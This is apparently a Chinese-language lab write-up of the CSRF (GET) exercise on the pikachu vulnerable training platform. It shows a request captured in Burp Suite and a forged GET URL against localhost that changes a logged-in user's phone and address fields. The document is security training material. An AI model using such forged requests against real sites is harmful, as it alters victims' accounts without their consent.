pikachu CSRF(get) 登录,根据提示登录 修改个人信息(随便修改) 先将代理关闭, 因为我在火狐上挂了两个代理,所以两个都要关闭。 提交后打开Burp Suite Community Edition 复制第一行 GET /vul/csrf/csrfget/csrf_get_edit.php?sex=lili&phonenum=man&add=shanghai&email=123%40qq.com&submit=submit HTTP/1.1 把两个代理都关闭
复制进入提交后页面的网络地址 http://localhost:8000/vul/csrf/csrfget/csrf_get.php 将代理复制的网址与网页网址合并 (http://localhost:8000/vul/csrf/csrfget/csrf_get.php GET/vul/csrf/csrfget/csrf_get_edit.php?sex=lili&phonenum=man&add=shanghai&email=123%40qq.com&submit=submit HTTP/1.1) GET删掉http://localhost:8000添加到第二个网页前面,并删除HTTP/1.1 得到 http://localhost:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=lili&phonenum=man&add=shanghai&email=123%40qq.com&submit=submit 可以更改信息,把phonenum改成woman,add改成shandong http://localhost:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=lili&phonenum=woman&add=shandong&email=123%40qq.com&submit=submit 加载该网页 修改成功,关闭当前网页,刷新旧网页后发现已经在网页上修改成功
|